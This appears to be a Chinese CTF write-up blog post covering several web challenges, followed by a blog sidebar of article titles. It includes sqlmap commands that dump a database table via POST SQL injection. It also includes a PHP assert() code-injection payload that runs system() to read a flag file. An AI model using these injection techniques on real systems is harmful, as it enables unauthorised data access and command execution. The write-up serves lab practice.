0x01 ics-06

查看源码发现:index.php

一开始直接用sqlmap跑了下没有发现注入,然后用brupsuite爆破参数


0x02 NewsCenter

SQL注入中的POST注入,查阅资料(下方链接)获知注入方法!

python2 sqlmap.py -r post.txt

可以获得如下信息:

  1. mysql 5 数据库
  2. Linux Debian9.0的服务器系统
  3. Apache 2.4.25的

接着来查看该数据库的表:python2 sqlmap.py -r post.txt --dbs

  1. python2 sqlmap.py -r post.txt -D "news" -T "secret_table" --columns
  2. python2 sqlmap.py -r post.txt -D "news" -T "secret_table" -C "fl4g,id" --dump


0x03 mfw

没有发现注入点,扫一波目录看看

在templates目录下发现:

//flag.php
<?php
// TODO
// $FLAG = '';
?>
//index.php
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
} $file = "templates/" . $page . ".php"; // I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!"); // TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
?>

assert以及stroops的具体用法百度可知,要使得第一个assert检查第一个断言为False

payload

yoloyanng')or system("cat templates/flag.php");//
$file="templates/yoloyanng')or system("cat templates/flag.php");//.php";

最后执行的就是:

assert("strpos('templates/yoloyanng') or system("cat templates/flag.php");//, '..') === false") or die("Detected hacking attempt!");

最后执行语句:

strpos('templates/yoloyanng') or system("cat templates/flag.php")


0x04 PHP2

首先扫目录也没扫出什么东西来,后来得知是index.phps

最新文章

  1. iOS学习-UITextField设置placeholder的颜色
  2. Kerberos简介及常见问题
  3. Material UI – Material Design CSS 框架
  4. Unity手游之路&lt;七&gt;角色控制器
  5. Hibernate Tools for Eclips Plugins
  6. 【SPOJ】1825. Free tour II(点分治)
  7. 委托delegate使用方法
  8. oracle学习 一 (持续更新中)
  9. MSXML读取XML中文
  10. Java发送邮件(带附件)
  11. iOS: 学习笔记, 动态添加按钮
  12. 导出页面文档(只在IE8下测试过)
  13. nginx(1)
  14. 门控开关项目--整流桥分析,LED限流电阻选择
  15. (一二四)tableView的多组数据展示和手动排序
  16. window下编译jcef
  17. makefile中.PHNOY的用法
  18. php的opcache缓存扩展
  19. stm8 I/O口模式配置
  20. 进程池(Pool)

热门文章

  1. shell脚本一一项目3
  2. 【大前端攻城狮之路&#183;二】Javascript&amp;QA⼯程师
  3. PHP继承及实现
  4. Centos7.2命令安装图形化界面
  5. PHP获得计算机的唯一标识[cpu,网卡]
  6. [Linux] 011 其它权限管理命令
  7. PHP开发环境搭建及开发工具
  8. NGUI的Lebal需注意问题
  9. Windows程序设计--(三)窗口与消息
  10. 快速部署业务类为webapi服务